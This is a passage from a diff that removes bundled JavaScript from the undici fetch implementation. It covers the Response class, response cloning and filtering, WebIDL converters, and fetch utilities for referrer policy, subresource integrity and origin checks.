"immutable", and this’s relevant Realm. - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - - // 5. Set responseObject’s response’s status to status. - responseObject[kState].status = status - - // 6. Let value be parsedURL, serialized and isomorphic encoded. 
- const value = isomorphicEncode(URLSerializer(parsedURL)) - - // 7. Append `Location`/value to responseObject’s response’s header list. - responseObject[kState].headersList.append('location', value) - - // 8. Return responseObject. - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response - constructor (body = null, init = {}) { - if (body !== null) { - body = webidl.converters.BodyInit(body) - } - - init = webidl.converters.ResponseInit(init) - - // TODO - this[kRealm] = { settingsObject: {} } - - // 1. Set this’s response to a new response. - this[kState] = makeResponse({}) - - // 2. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is this’s response’s header list and guard - // is "response". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kGuard] = 'response' - this[kHeaders][kHeadersList] = this[kState].headersList - this[kHeaders][kRealm] = this[kRealm] - - // 3. Let bodyWithType be null. - let bodyWithType = null - - // 4. If body is non-null, then set bodyWithType to the result of extracting body. - if (body != null) { - const [extractedBody, type] = extractBody(body) - bodyWithType = { body: extractedBody, type } - } - - // 5. Perform initialize a response given this, init, and bodyWithType. - initializeResponse(this, init, bodyWithType) - } - - // Returns response’s type, e.g., "cors". - get type () { - webidl.brandCheck(this, Response) - - // The type getter steps are to return this’s response’s type. - return this[kState].type - } - - // Returns response’s URL, if it has one; otherwise the empty string. - get url () { - webidl.brandCheck(this, Response) - - const urlList = this[kState].urlList - - // The url getter steps are to return the empty string if this’s - // response’s URL is null; otherwise this’s response’s URL, - // serialized with exclude fragment set to true. - const url = urlList[urlList.length - 1] ?? 
null - - if (url === null) { - return '' - } - - return URLSerializer(url, true) - } - - // Returns whether response was obtained through a redirect. - get redirected () { - webidl.brandCheck(this, Response) - - // The redirected getter steps are to return true if this’s response’s URL - // list has more than one item; otherwise false. - return this[kState].urlList.length > 1 - } - - // Returns response’s status. - get status () { - webidl.brandCheck(this, Response) - - // The status getter steps are to return this’s response’s status. - return this[kState].status - } - - // Returns whether response’s status is an ok status. - get ok () { - webidl.brandCheck(this, Response) - - // The ok getter steps are to return true if this’s response’s status is an - // ok status; otherwise false. - return this[kState].status >= 200 && this[kState].status <= 299 - } - - // Returns response’s status message. - get statusText () { - webidl.brandCheck(this, Response) - - // The statusText getter steps are to return this’s response’s status - // message. - return this[kState].statusText - } - - // Returns response’s headers as Headers. - get headers () { - webidl.brandCheck(this, Response) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - get body () { - webidl.brandCheck(this, Response) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Response) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - // Returns a clone of response. - clone () { - webidl.brandCheck(this, Response) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || (this.body && this.body.locked)) { - throw webidl.errors.exception({ - header: 'Response.clone', - message: 'Body has already been consumed.' - }) - } - - // 2. Let clonedResponse be the result of cloning this’s response. - const clonedResponse = cloneResponse(this[kState]) - - // 3. 
Return the result of creating a Response object, given - // clonedResponse, this’s headers’s guard, and this’s relevant Realm. - const clonedResponseObject = new Response() - clonedResponseObject[kState] = clonedResponse - clonedResponseObject[kRealm] = this[kRealm] - clonedResponseObject[kHeaders][kHeadersList] = clonedResponse.headersList - clonedResponseObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedResponseObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - return clonedResponseObject - } -} - -mixinBody(Response) - -Object.defineProperties(Response.prototype, { - type: kEnumerableProperty, - url: kEnumerableProperty, - status: kEnumerableProperty, - ok: kEnumerableProperty, - redirected: kEnumerableProperty, - statusText: kEnumerableProperty, - headers: kEnumerableProperty, - clone: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Response', - configurable: true - } -}) - -Object.defineProperties(Response, { - json: kEnumerableProperty, - redirect: kEnumerableProperty, - error: kEnumerableProperty -}) - -// https://fetch.spec.whatwg.org/#concept-response-clone -function cloneResponse (response) { - // To clone a response response, run these steps: - - // 1. If response is a filtered response, then return a new identical - // filtered response whose internal response is a clone of response’s - // internal response. - if (response.internalResponse) { - return filterResponse( - cloneResponse(response.internalResponse), - response.type - ) - } - - // 2. Let newResponse be a copy of response, except for its body. - const newResponse = makeResponse({ ...response, body: null }) - - // 3. If response’s body is non-null, then set newResponse’s body to the - // result of cloning response’s body. - if (response.body != null) { - newResponse.body = cloneBody(response.body) - } - - // 4. Return newResponse. 
- return newResponse -} - -function makeResponse (init) { - return { - aborted: false, - rangeRequested: false, - timingAllowPassed: false, - requestIncludesCredentials: false, - type: 'default', - status: 200, - timingInfo: null, - cacheState: '', - statusText: '', - ...init, - headersList: init.headersList - ? new HeadersList(init.headersList) - : new HeadersList(), - urlList: init.urlList ? [...init.urlList] : [] - } -} - -function makeNetworkError (reason) { - const isError = isErrorLike(reason) - return makeResponse({ - type: 'error', - status: 0, - error: isError - ? reason - : new Error(reason ? String(reason) : reason), - aborted: reason && reason.name === 'AbortError' - }) -} - -function makeFilteredResponse (response, state) { - state = { - internalResponse: response, - ...state - } - - return new Proxy(response, { - get (target, p) { - return p in state ? state[p] : target[p] - }, - set (target, p, value) { - assert(!(p in state)) - target[p] = value - return true - } - }) -} - -// https://fetch.spec.whatwg.org/#concept-filtered-response -function filterResponse (response, type) { - // Set response to the following filtered response with response as its - // internal response, depending on request’s response tainting: - if (type === 'basic') { - // A basic filtered response is a filtered response whose type is "basic" - // and header list excludes any headers in internal response’s header list - // whose name is a forbidden response-header name. - - // Note: undici does not implement forbidden response-header names - return makeFilteredResponse(response, { - type: 'basic', - headersList: response.headersList - }) - } else if (type === 'cors') { - // A CORS filtered response is a filtered response whose type is "cors" - // and header list excludes any headers in internal response’s header - // list whose name is not a CORS-safelisted response-header name, given - // internal response’s CORS-exposed header-name list. 
- - // Note: undici does not implement CORS-safelisted response-header names - return makeFilteredResponse(response, { - type: 'cors', - headersList: response.headersList - }) - } else if (type === 'opaque') { - // An opaque filtered response is a filtered response whose type is - // "opaque", URL list is the empty list, status is 0, status message - // is the empty byte sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaque', - urlList: Object.freeze([]), - status: 0, - statusText: '', - body: null - }) - } else if (type === 'opaqueredirect') { - // An opaque-redirect filtered response is a filtered response whose type - // is "opaqueredirect", status is 0, status message is the empty byte - // sequence, header list is empty, and body is null. - - return makeFilteredResponse(response, { - type: 'opaqueredirect', - status: 0, - statusText: '', - headersList: [], - body: null - }) - } else { - assert(false) - } -} - -// https://fetch.spec.whatwg.org/#appropriate-network-error -function makeAppropriateNetworkError (fetchParams, err = null) { - // 1. Assert: fetchParams is canceled. - assert(isCancelled(fetchParams)) - - // 2. Return an aborted network error if fetchParams is aborted; - // otherwise return a network error. - return isAborted(fetchParams) - ? makeNetworkError(Object.assign(new DOMException('The operation was aborted.', 'AbortError'), { cause: err })) - : makeNetworkError(Object.assign(new DOMException('Request was cancelled.'), { cause: err })) -} - -// https://whatpr.org/fetch/1392.html#initialize-a-response -function initializeResponse (response, init, body) { - // 1. If init["status"] is not in the range 200 to 599, inclusive, then - // throw a RangeError. - if (init.status !== null && (init.status < 200 || init.status > 599)) { - throw new RangeError('init["status"] must be in the range of 200 to 599, inclusive.') - } - - // 2. 
If init["statusText"] does not match the reason-phrase token production, - // then throw a TypeError. - if ('statusText' in init && init.statusText != null) { - // See, https://datatracker.ietf.org/doc/html/rfc7230#section-3.1.2: - // reason-phrase = *( HTAB / SP / VCHAR / obs-text ) - if (!isValidReasonPhrase(String(init.statusText))) { - throw new TypeError('Invalid statusText') - } - } - - // 3. Set response’s response’s status to init["status"]. - if ('status' in init && init.status != null) { - response[kState].status = init.status - } - - // 4. Set response’s response’s status message to init["statusText"]. - if ('statusText' in init && init.statusText != null) { - response[kState].statusText = init.statusText - } - - // 5. If init["headers"] exists, then fill response’s headers with init["headers"]. - if ('headers' in init && init.headers != null) { - fill(response[kHeaders], init.headers) - } - - // 6. If body was given, then: - if (body) { - // 1. If response's status is a null body status, then throw a TypeError. - if (nullBodyStatus.includes(response.status)) { - throw webidl.errors.exception({ - header: 'Response constructor', - message: 'Invalid response status code ' + response.status - }) - } - - // 2. Set response's body to body's body. - response[kState].body = body.body - - // 3. If body's type is non-null and response's header list does not contain - // `Content-Type`, then append (`Content-Type`, body's type) to response's header list. 
- if (body.type != null && !response[kState].headersList.contains('Content-Type')) { - response[kState].headersList.append('content-type', body.type) - } - } -} - -webidl.converters.ReadableStream = webidl.interfaceConverter( - ReadableStream -) - -webidl.converters.FormData = webidl.interfaceConverter( - FormData -) - -webidl.converters.URLSearchParams = webidl.interfaceConverter( - URLSearchParams -) - -// https://fetch.spec.whatwg.org/#typedefdef-xmlhttprequestbodyinit -webidl.converters.XMLHttpRequestBodyInit = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (types.isArrayBuffer(V) || types.isTypedArray(V) || types.isDataView(V)) { - return webidl.converters.BufferSource(V) - } - - if (util.isFormDataLike(V)) { - return webidl.converters.FormData(V, { strict: false }) - } - - if (V instanceof URLSearchParams) { - return webidl.converters.URLSearchParams(V) - } - - return webidl.converters.DOMString(V) -} - -// https://fetch.spec.whatwg.org/#bodyinit -webidl.converters.BodyInit = function (V) { - if (V instanceof ReadableStream) { - return webidl.converters.ReadableStream(V) - } - - // Note: the spec doesn't include async iterables, - // this is an undici extension. 
- if (V?.[Symbol.asyncIterator]) { - return V - } - - return webidl.converters.XMLHttpRequestBodyInit(V) -} - -webidl.converters.ResponseInit = webidl.dictionaryConverter([ - { - key: 'status', - converter: webidl.converters['unsigned short'], - defaultValue: 200 - }, - { - key: 'statusText', - converter: webidl.converters.ByteString, - defaultValue: '' - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - } -]) - -module.exports = { - makeNetworkError, - makeResponse, - makeAppropriateNetworkError, - filterResponse, - Response, - cloneResponse -} - - -/***/ }), - -/***/ 5861: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kUrl: Symbol('url'), - kHeaders: Symbol('headers'), - kSignal: Symbol('signal'), - kState: Symbol('state'), - kGuard: Symbol('guard'), - kRealm: Symbol('realm') -} - - -/***/ }), - -/***/ 2538: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { redirectStatusSet, referrerPolicySet: referrerPolicyTokens, badPortsSet } = __nccwpck_require__(1037) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { performance } = __nccwpck_require__(4074) -const { isBlobLike, toUSVString, ReadableStreamFrom } = __nccwpck_require__(3983) -const assert = __nccwpck_require__(9491) -const { isUint8Array } = __nccwpck_require__(9830) - -// https://nodejs.org/api/crypto.html#determining-if-crypto-support-is-unavailable -/** @type {import('crypto')|undefined} */ -let crypto - -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -function responseURL (response) { - // https://fetch.spec.whatwg.org/#responses - // A response has an associated URL. It is a pointer to the last URL - // in response’s URL list and null if response’s URL list is empty. - const urlList = response.urlList - const length = urlList.length - return length === 0 ? 
null : urlList[length - 1].toString() -} - -// https://fetch.spec.whatwg.org/#concept-response-location-url -function responseLocationURL (response, requestFragment) { - // 1. If response’s status is not a redirect status, then return null. - if (!redirectStatusSet.has(response.status)) { - return null - } - - // 2. Let location be the result of extracting header list values given - // `Location` and response’s header list. - let location = response.headersList.get('location') - - // 3. If location is a header value, then set location to the result of - // parsing location with response’s URL. - if (location !== null && isValidHeaderValue(location)) { - location = new URL(location, responseURL(response)) - } - - // 4. If location is a URL whose fragment is null, then set location’s - // fragment to requestFragment. - if (location && !location.hash) { - location.hash = requestFragment - } - - // 5. Return location. - return location -} - -/** @returns {URL} */ -function requestCurrentURL (request) { - return request.urlList[request.urlList.length - 1] -} - -function requestBadPort (request) { - // 1. Let url be request’s current URL. - const url = requestCurrentURL(request) - - // 2. If url’s scheme is an HTTP(S) scheme and url’s port is a bad port, - // then return blocked. - if (urlIsHttpHttpsScheme(url) && badPortsSet.has(url.port)) { - return 'blocked' - } - - // 3. Return allowed. - return 'allowed' -} - -function isErrorLike (object) { - return object instanceof Error || ( - object?.constructor?.name === 'Error' || - object?.constructor?.name === 'DOMException' - ) -} - -// Check whether |statusText| is a ByteString and -// matches the Reason-Phrase token production. 
-// RFC 2616: https://tools.ietf.org/html/rfc2616 -// RFC 7230: https://tools.ietf.org/html/rfc7230 -// "reason-phrase = *( HTAB / SP / VCHAR / obs-text )" -// https://github.com/chromium/chromium/blob/94.0.4604.1/third_party/blink/renderer/core/fetch/response.cc#L116 -function isValidReasonPhrase (statusText) { - for (let i = 0; i < statusText.length; ++i) { - const c = statusText.charCodeAt(i) - if ( - !( - ( - c === 0x09 || // HTAB - (c >= 0x20 && c <= 0x7e) || // SP / VCHAR - (c >= 0x80 && c <= 0xff) - ) // obs-text - ) - ) { - return false - } - } - return true -} - -/** - * @see https://tools.ietf.org/html/rfc7230#section-3.2.6 - * @param {number} c - */ -function isTokenCharCode (c) { - switch (c) { - case 0x22: - case 0x28: - case 0x29: - case 0x2c: - case 0x2f: - case 0x3a: - case 0x3b: - case 0x3c: - case 0x3d: - case 0x3e: - case 0x3f: - case 0x40: - case 0x5b: - case 0x5c: - case 0x5d: - case 0x7b: - case 0x7d: - // DQUOTE and "(),/:;<=>?@[\]{}" - return false - default: - // VCHAR %x21-7E - return c >= 0x21 && c <= 0x7e - } -} - -/** - * @param {string} characters - */ -function isValidHTTPToken (characters) { - if (characters.length === 0) { - return false - } - for (let i = 0; i < characters.length; ++i) { - if (!isTokenCharCode(characters.charCodeAt(i))) { - return false - } - } - return true -} - -/** - * @see https://fetch.spec.whatwg.org/#header-name - * @param {string} potentialValue - */ -function isValidHeaderName (potentialValue) { - return isValidHTTPToken(potentialValue) -} - -/** - * @see https://fetch.spec.whatwg.org/#header-value - * @param {string} potentialValue - */ -function isValidHeaderValue (potentialValue) { - // - Has no leading or trailing HTTP tab or space bytes. - // - Contains no 0x00 (NUL) or HTTP newline bytes. 
- if ( - potentialValue.startsWith('\t') || - potentialValue.startsWith(' ') || - potentialValue.endsWith('\t') || - potentialValue.endsWith(' ') - ) { - return false - } - - if ( - potentialValue.includes('\0') || - potentialValue.includes('\r') || - potentialValue.includes('\n') - ) { - return false - } - - return true -} - -// https://w3c.github.io/webappsec-referrer-policy/#set-requests-referrer-policy-on-redirect -function setRequestReferrerPolicyOnRedirect (request, actualResponse) { - // Given a request request and a response actualResponse, this algorithm - // updates request’s referrer policy according to the Referrer-Policy - // header (if any) in actualResponse. - - // 1. Let policy be the result of executing § 8.1 Parse a referrer policy - // from a Referrer-Policy header on actualResponse. - - // 8.1 Parse a referrer policy from a Referrer-Policy header - // 1. Let policy-tokens be the result of extracting header list values given `Referrer-Policy` and response’s header list. - const { headersList } = actualResponse - // 2. Let policy be the empty string. - // 3. For each token in policy-tokens, if token is a referrer policy and token is not the empty string, then set policy to token. - // 4. Return policy. - const policyHeader = (headersList.get('referrer-policy') ?? '').split(',') - - // Note: As the referrer-policy can contain multiple policies - // separated by comma, we need to loop through all of them - // and pick the first valid one. - // Ref: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy#specify_a_fallback_policy - let policy = '' - if (policyHeader.length > 0) { - // The right-most policy takes precedence. - // The left-most policy is the fallback. - for (let i = policyHeader.length; i !== 0; i--) { - const token = policyHeader[i - 1].trim() - if (referrerPolicyTokens.has(token)) { - policy = token - break - } - } - } - - // 2. If policy is not the empty string, then set request’s referrer policy to policy. 
- if (policy !== '') { - request.referrerPolicy = policy - } -} - -// https://fetch.spec.whatwg.org/#cross-origin-resource-policy-check -function crossOriginResourcePolicyCheck () { - // TODO - return 'allowed' -} - -// https://fetch.spec.whatwg.org/#concept-cors-check -function corsCheck () { - // TODO - return 'success' -} - -// https://fetch.spec.whatwg.org/#concept-tao-check -function TAOCheck () { - // TODO - return 'success' -} - -function appendFetchMetadata (httpRequest) { - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-dest-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-mode-header - - // 1. Assert: r’s url is a potentially trustworthy URL. - // TODO - - // 2. Let header be a Structured Header whose value is a token. - let header = null - - // 3. Set header’s value to r’s mode. - header = httpRequest.mode - - // 4. Set a structured field value `Sec-Fetch-Mode`/header in r’s header list. - httpRequest.headersList.set('sec-fetch-mode', header) - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header - // TODO - - // https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-user-header - // TODO -} - -// https://fetch.spec.whatwg.org/#append-a-request-origin-header -function appendRequestOriginHeader (request) { - // 1. Let serializedOrigin be the result of byte-serializing a request origin with request. - let serializedOrigin = request.origin - - // 2. If request’s response tainting is "cors" or request’s mode is "websocket", then append (`Origin`, serializedOrigin) to request’s header list. - if (request.responseTainting === 'cors' || request.mode === 'websocket') { - if (serializedOrigin) { - request.headersList.append('origin', serializedOrigin) - } - - // 3. Otherwise, if request’s method is neither `GET` nor `HEAD`, then: - } else if (request.method !== 'GET' && request.method !== 'HEAD') { - // 1. 
Switch on request’s referrer policy: - switch (request.referrerPolicy) { - case 'no-referrer': - // Set serializedOrigin to `null`. - serializedOrigin = null - break - case 'no-referrer-when-downgrade': - case 'strict-origin': - case 'strict-origin-when-cross-origin': - // If request’s origin is a tuple origin, its scheme is "https", and request’s current URL’s scheme is not "https", then set serializedOrigin to `null`. - if (request.origin && urlHasHttpsScheme(request.origin) && !urlHasHttpsScheme(requestCurrentURL(request))) { - serializedOrigin = null - } - break - case 'same-origin': - // If request’s origin is not same origin with request’s current URL’s origin, then set serializedOrigin to `null`. - if (!sameOrigin(request, requestCurrentURL(request))) { - serializedOrigin = null - } - break - default: - // Do nothing. - } - - if (serializedOrigin) { - // 2. Append (`Origin`, serializedOrigin) to request’s header list. - request.headersList.append('origin', serializedOrigin) - } - } -} - -function coarsenedSharedCurrentTime (crossOriginIsolatedCapability) { - // TODO - return performance.now() -} - -// https://fetch.spec.whatwg.org/#create-an-opaque-timing-info -function createOpaqueTimingInfo (timingInfo) { - return { - startTime: timingInfo.startTime ?? 0, - redirectStartTime: 0, - redirectEndTime: 0, - postRedirectStartTime: timingInfo.startTime ?? 
0, - finalServiceWorkerStartTime: 0, - finalNetworkResponseStartTime: 0, - finalNetworkRequestStartTime: 0, - endTime: 0, - encodedBodySize: 0, - decodedBodySize: 0, - finalConnectionTimingInfo: null - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#policy-container -function makePolicyContainer () { - // Note: the fetch spec doesn't make use of embedder policy or CSP list - return { - referrerPolicy: 'strict-origin-when-cross-origin' - } -} - -// https://html.spec.whatwg.org/multipage/origin.html#clone-a-policy-container -function clonePolicyContainer (policyContainer) { - return { - referrerPolicy: policyContainer.referrerPolicy - } -} - -// https://w3c.github.io/webappsec-referrer-policy/#determine-requests-referrer -function determineRequestsReferrer (request) { - // 1. Let policy be request's referrer policy. - const policy = request.referrerPolicy - - // Note: policy cannot (shouldn't) be null or an empty string. - assert(policy) - - // 2. Let environment be request’s client. - - let referrerSource = null - - // 3. Switch on request’s referrer: - if (request.referrer === 'client') { - // Note: node isn't a browser and doesn't implement document/iframes, - // so we bypass this step and replace it with our own. - - const globalOrigin = getGlobalOrigin() - - if (!globalOrigin || globalOrigin.origin === 'null') { - return 'no-referrer' - } - - // note: we need to clone it as it's mutated - referrerSource = new URL(globalOrigin) - } else if (request.referrer instanceof URL) { - // Let referrerSource be request’s referrer. - referrerSource = request.referrer - } - - // 4. Let request’s referrerURL be the result of stripping referrerSource for - // use as a referrer. - let referrerURL = stripURLForReferrer(referrerSource) - - // 5. Let referrerOrigin be the result of stripping referrerSource for use as - // a referrer, with the origin-only flag set to true. - const referrerOrigin = stripURLForReferrer(referrerSource, true) - - // 6. 
If the result of serializing referrerURL is a string whose length is - // greater than 4096, set referrerURL to referrerOrigin. - if (referrerURL.toString().length > 4096) { - referrerURL = referrerOrigin - } - - const areSameOrigin = sameOrigin(request, referrerURL) - const isNonPotentiallyTrustWorthy = isURLPotentiallyTrustworthy(referrerURL) && - !isURLPotentiallyTrustworthy(request.url) - - // 8. Execute the switch statements corresponding to the value of policy: - switch (policy) { - case 'origin': return referrerOrigin != null ? referrerOrigin : stripURLForReferrer(referrerSource, true) - case 'unsafe-url': return referrerURL - case 'same-origin': - return areSameOrigin ? referrerOrigin : 'no-referrer' - case 'origin-when-cross-origin': - return areSameOrigin ? referrerURL : referrerOrigin - case 'strict-origin-when-cross-origin': { - const currentURL = requestCurrentURL(request) - - // 1. If the origin of referrerURL and the origin of request’s current - // URL are the same, then return referrerURL. - if (sameOrigin(referrerURL, currentURL)) { - return referrerURL - } - - // 2. If referrerURL is a potentially trustworthy URL and request’s - // current URL is not a potentially trustworthy URL, then return no - // referrer. - if (isURLPotentiallyTrustworthy(referrerURL) && !isURLPotentiallyTrustworthy(currentURL)) { - return 'no-referrer' - } - - // 3. Return referrerOrigin. - return referrerOrigin - } - case 'strict-origin': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - case 'no-referrer-when-downgrade': // eslint-disable-line - /** - * 1. If referrerURL is a potentially trustworthy URL and - * request’s current URL is not a potentially trustworthy URL, - * then return no referrer. - * 2. Return referrerOrigin - */ - - default: // eslint-disable-line - return isNonPotentiallyTrustWorthy ? 
'no-referrer' : referrerOrigin - } -} - -/** - * @see https://w3c.github.io/webappsec-referrer-policy/#strip-url - * @param {URL} url - * @param {boolean|undefined} originOnly - */ -function stripURLForReferrer (url, originOnly) { - // 1. Assert: url is a URL. - assert(url instanceof URL) - - // 2. If url’s scheme is a local scheme, then return no referrer. - if (url.protocol === 'file:' || url.protocol === 'about:' || url.protocol === 'blank:') { - return 'no-referrer' - } - - // 3. Set url’s username to the empty string. - url.username = '' - - // 4. Set url’s password to the empty string. - url.password = '' - - // 5. Set url’s fragment to null. - url.hash = '' - - // 6. If the origin-only flag is true, then: - if (originOnly) { - // 1. Set url’s path to « the empty string ». - url.pathname = '' - - // 2. Set url’s query to null. - url.search = '' - } - - // 7. Return url. - return url -} - -function isURLPotentiallyTrustworthy (url) { - if (!(url instanceof URL)) { - return false - } - - // If child of about, return true - if (url.href === 'about:blank' || url.href === 'about:srcdoc') { - return true - } - - // If scheme is data, return true - if (url.protocol === 'data:') return true - - // If file, return true - if (url.protocol === 'file:') return true - - return isOriginPotentiallyTrustworthy(url.origin) - - function isOriginPotentiallyTrustworthy (origin) { - // If origin is explicitly null, return false - if (origin == null || origin === 'null') return false - - const originAsURL = new URL(origin) - - // If secure, return true - if (originAsURL.protocol === 'https:' || originAsURL.protocol === 'wss:') { - return true - } - - // If localhost or variants, return true - if (/^127(?:\.[0-9]+){0,2}\.[0-9]+$|^\[(?:0*:)*?:?0*1\]$/.test(originAsURL.hostname) || - (originAsURL.hostname === 'localhost' || originAsURL.hostname.includes('localhost.')) || - (originAsURL.hostname.endsWith('.localhost'))) { - return true - } - - // If any other, return false - return 
false - } -} - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#does-response-match-metadatalist - * @param {Uint8Array} bytes - * @param {string} metadataList - */ -function bytesMatch (bytes, metadataList) { - // If node is not built with OpenSSL support, we cannot check - // a request's integrity, so allow it by default (the spec will - // allow requests if an invalid hash is given, as precedence). - /* istanbul ignore if: only if node is built with --without-ssl */ - if (crypto === undefined) { - return true - } - - // 1. Let parsedMetadata be the result of parsing metadataList. - const parsedMetadata = parseMetadata(metadataList) - - // 2. If parsedMetadata is no metadata, return true. - if (parsedMetadata === 'no metadata') { - return true - } - - // 3. If parsedMetadata is the empty set, return true. - if (parsedMetadata.length === 0) { - return true - } - - // 4. Let metadata be the result of getting the strongest - // metadata from parsedMetadata. - const list = parsedMetadata.sort((c, d) => d.algo.localeCompare(c.algo)) - // get the strongest algorithm - const strongest = list[0].algo - // get all entries that use the strongest algorithm; ignore weaker - const metadata = list.filter((item) => item.algo === strongest) - - // 5. For each item in metadata: - for (const item of metadata) { - // 1. Let algorithm be the alg component of item. - const algorithm = item.algo - - // 2. Let expectedValue be the val component of item. - let expectedValue = item.hash - - // See https://github.com/web-platform-tests/wpt/commit/e4c5cc7a5e48093220528dfdd1c4012dc3837a0e - // "be liberal with padding". This is annoying, and it's not even in the spec. - - if (expectedValue.endsWith('==')) { - expectedValue = expectedValue.slice(0, -2) - } - - // 3. Let actualValue be the result of applying algorithm to bytes. 
- let actualValue = crypto.createHash(algorithm).update(bytes).digest('base64') - - if (actualValue.endsWith('==')) { - actualValue = actualValue.slice(0, -2) - } - - // 4. If actualValue is a case-sensitive match for expectedValue, - // return true. - if (actualValue === expectedValue) { - return true - } - - let actualBase64URL = crypto.createHash(algorithm).update(bytes).digest('base64url') - - if (actualBase64URL.endsWith('==')) { - actualBase64URL = actualBase64URL.slice(0, -2) - } - - if (actualBase64URL === expectedValue) { - return true - } - } - - // 6. Return false. - return false -} - -// https://w3c.github.io/webappsec-subresource-integrity/#grammardef-hash-with-options -// https://www.w3.org/TR/CSP2/#source-list-syntax -// https://www.rfc-editor.org/rfc/rfc5234#appendix-B.1 -const parseHashWithOptions = /((?sha256|sha384|sha512)-(?[A-z0-9+/]{1}.*={0,2}))( +[\x21-\x7e]?)?/i - -/** - * @see https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata - * @param {string} metadata - */ -function parseMetadata (metadata) { - // 1. Let result be the empty set. - /** @type {{ algo: string, hash: string }[]} */ - const result = [] - - // 2. Let empty be equal to true. - let empty = true - - const supportedHashes = crypto.getHashes() - - // 3. For each token returned by splitting metadata on spaces: - for (const token of metadata.split(' ')) { - // 1. Set empty to false. - empty = false - - // 2. Parse token as a hash-with-options. - const parsedToken = parseHashWithOptions.exec(token) - - // 3. If token does not parse, continue to the next token. - if (parsedToken === null || parsedToken.groups === undefined) { - // Note: Chromium blocks the request at this point, but Firefox - // gives a warning that an invalid integrity was given. The - // correct behavior is to ignore these, and subsequently not - // check the integrity of the resource. - continue - } - - // 4. Let algorithm be the hash-algo component of token. 
- const algorithm = parsedToken.groups.algo - - // 5. If algorithm is a hash function recognized by the user - // agent, add the parsed token to result. - if (supportedHashes.includes(algorithm.toLowerCase())) { - result.push(parsedToken.groups) - } - } - - // 4. Return no metadata if empty is true, otherwise return result. - if (empty === true) { - return 'no metadata' - } - - return result -} - -// https://w3c.github.io/webappsec-upgrade-insecure-requests/#upgrade-request -function tryUpgradeRequestToAPotentiallyTrustworthyURL (request) { - // TODO -} - -/** - * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} - * @param {URL} A - * @param {URL} B - */ -function sameOrigin (A, B) { - // 1. If A and B are the same opaque origin, then return true. - if (A.origin === B.origin && A.origin === 'null') { - return true - } - - // 2. If A and B are both tuple origins and their schemes, - // hosts, and port are identical, then return true. - if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { - return true - } - - // 3. Return false. - return false -} - -function createDeferredPromise () { - let res - let rej - const promise = new Promise((resolve, reject) => { - res = resolve - rej = reject - }) - - return { promise, resolve: res, reject: rej } -} - -function isAborted (fetchParams) { - return fetchParams.controller.state === 'aborted' -} - -function isCancelled (fetchParams) { - return fetchParams.controller.state === 'aborted' || - fetchParams.controller.state === 'terminated' -} - -const normalizeMethodRecord = { - delete: 'DELETE', - DELETE: 'DELETE', - get: 'GET', - GET: 'GET', - head: 'HEAD', - HEAD: 'HEAD', - options: 'OPTIONS', - OPTIONS: 'OPTIONS', - post: 'POST', - POST: 'POST', - put: 'PUT', - PUT: 'PUT' -} - -// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. 
-Object.setPrototypeOf(normalizeMethodRecord, null) - -/** - * @see https://fetch.spec.whatwg.org/#concept-method-normalize - * @param {string} method - */ -function normalizeMethod (method) { - return normalizeMethodRecord[method.toLowerCase()] ?? method -} - -// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string -function serializeJavascriptValueToJSONString (value) { - // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). - const result = JSON.stringify(value) - - // 2. If result is undefined, then throw a TypeError. - if (result === undefined) { - throw new TypeError('Value is not JSON serializable') - } - - // 3. Assert: result is a string. - assert(typeof result === 'string') - - // 4. Return result. - return result -} - -// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object -const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) - -/** - * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object - * @param {() => unknown[]} iterator - * @param {string} name name of the instance - * @param {'key'|'value'|'key+value'} kind - */ -function makeIterator (iterator, name, kind) { - const object = { - index: 0, - kind, - target: iterator - } - - const i = { - next () { - // 1. Let interface be the interface for which the iterator prototype object exists. - - // 2. Let thisValue be the this value. - - // 3. Let object be ? ToObject(thisValue). - - // 4. If object is a platform object, then perform a security - // check, passing: - - // 5. If object is not a default iterator object for interface, - // then throw a TypeError. - if (Object.getPrototypeOf(this) !== i) { - throw new TypeError( - `'next' called on an object that does not implement interface ${name} Iterator.` - ) - } - - // 6. Let index be object’s index. - // 7. Let kind be object’s kind. - // 8. Let values be object’s target's value pairs to iterate over. 
